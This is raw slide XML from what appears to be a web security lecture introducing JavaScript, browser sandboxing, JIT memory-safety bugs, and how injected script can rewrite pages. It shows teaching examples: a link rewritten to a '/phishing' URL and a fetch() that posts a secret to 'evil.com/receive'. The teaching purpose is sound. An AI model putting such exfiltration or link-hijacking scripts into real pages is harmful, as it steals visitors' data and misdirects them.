            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>JavaScript is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>client-side</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Code sent by the server as part of the response</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Runs in the browser, not the web server!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Used to manipulate web pages (HTML and CSS)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Makes modern websites interactive</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>JavaScript can be directly embedded in HTML with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> tags</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Most modern webpages involve JavaScript</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>JavaScript is supported by all modern web browsers</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>You don’t need to know JavaScript syntax</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>However, knowing common attack functions helps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Fact Sheet</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="433" name="Google Shape;43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High-level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Dynamically-typed</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Interpreted</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Supports objects</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Fast</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>JavaScript is used in almost every web application, so a lot of work goes into making it execute quickly</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Just-in-time compiling (compile code at runtime immediately before executing it) helps speed up execution</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="434" name="Google Shape;43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Vulnerabilities in the JavaScript interpreter/compiler</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="440" name="Google Shape;4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41" name="Google Shape;441;p58"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198500" y="1246825"/>
            <a:ext cx="87891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web browser runs JavaScript from external websites</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Malicious websites can send JavaScript to the browser!</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Browsers are sandboxed to prevent any malicious code from doing too much damage</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>A vulnerability in the browser’s JavaScript interpreter/compiler is very dangerous</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Just-in-time compilers need memory that’s both writable and executable (write the machine code and then execute it)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>If the interpreter is vulnerable, an attacker can exploit memory safety bugs</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Example: “Use-after-free” on a JavaScript object results in an arbitrary read/write primitive</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>An attacker can now force the JavaScript program to inspect memory</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>Takeaway</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>: JavaScript is memory-safe and sandboxed, but a vulnerable interpreter/compiler can result in memory safety exploits!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47" name="Google Shape;447;p59"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198500" y="1246825"/>
            <a:ext cx="8520600" cy="51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Modify any part of the webpage (e.g. HTML or CSS)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="448" name="Google Shape;44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49" name="Google Shape;449;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="335150" y="206280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rPr>
              <a:t>Test</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="450" name="Google Shape;450;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="337314" y="172082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1" name="Google Shape;451;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2729075" y="206280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ourier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;a id="link" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>="https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>test.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>"&gt;Test&lt;/a&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="452" name="Google Shape;452;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2735149" y="1720825"/>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(before JavaScript executes)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="453" name="Google Shape;453;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="335150" y="357245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rPr>
              <a:t>Test</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="454" name="Google Shape;454;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="337326" y="403407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5" name="Google Shape;455;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2732663" y="357245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ourier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;a id="link" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>="https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>test.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>/phishing"&gt;Test&lt;/a&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="456" name="Google Shape;456;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2737649" y="4011150"/>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(after JavaScript executes)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="457" name="Google Shape;457;p59"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="449" idx="2"/>
            <a:endCxn id="453" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1383950" y="2582700"/>
            <a:ext cx="0" cy="989700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="458" name="Google Shape;458;p59"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="451" idx="2"/>
            <a:endCxn id="455" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5673275" y="2582700"/>
            <a:ext cx="3600" cy="98970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p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="315800" y="2857875"/>
            <a:ext cx="82860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dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</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link").</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>setAttribute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>href</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>test.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>/phishing</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a:t>
            </a:r>
            <a:endParaRPr sz="1300" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="460" name="Google Shape;460;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="315800" y="4567750"/>
            <a:ext cx="7272900" cy="40007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JavaScript changed the link! Now clicking it opens </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>test.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>/phishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"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66" name="Google Shape;466;p60"/>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Create a pop-up message</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="467" name="Google Shape;467;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68" name="Google Shape;468;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="579500" y="2108700"/>
            <a:ext cx="41379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&lt;script&gt;alert("Happy Birthday!")&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="469" name="Google Shape;469;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584850" y="17667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sp>
        <p:nvSpPr>
          <p:cNvPr id="470" name="Google Shape;470;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584850" y="3343700"/>
            <a:ext cx="4052700" cy="16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71" name="Google Shape;471;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="590957" y="30017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72" name="Google Shape;472;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1685650" y="3776000"/>
            <a:ext cx="1580100" cy="745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Happy Birthday!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73" name="Google Shape;473;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2201350" y="4104100"/>
            <a:ext cx="5487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OK</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="474" name="Google Shape;474;p60"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="475" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3310600" y="4105600"/>
            <a:ext cx="1968900" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="E69138"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="475" name="Google Shape;475;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5279500" y="3689950"/>
            <a:ext cx="31347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When the browser loads this HTML, it will run the embedded JavaScript and cause a pop-up to appear.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81" name="Google Shape;481;p61"/>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HTTP requests</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="482" name="Google Shape;48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83" name="Google Shape;483;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="456375" y="2161500"/>
            <a:ext cx="7573500" cy="110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&lt;script&gt;int secret = 42;&lt;/script&gt;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&lt;script&gt;fetch('https://evil.com/receive',{method:'POST', body: secret})&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="484" name="Google Shape;484;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="461725" y="1819525"/>
            <a:ext cx="757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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="485" name="Google Shape;485;p61"/>
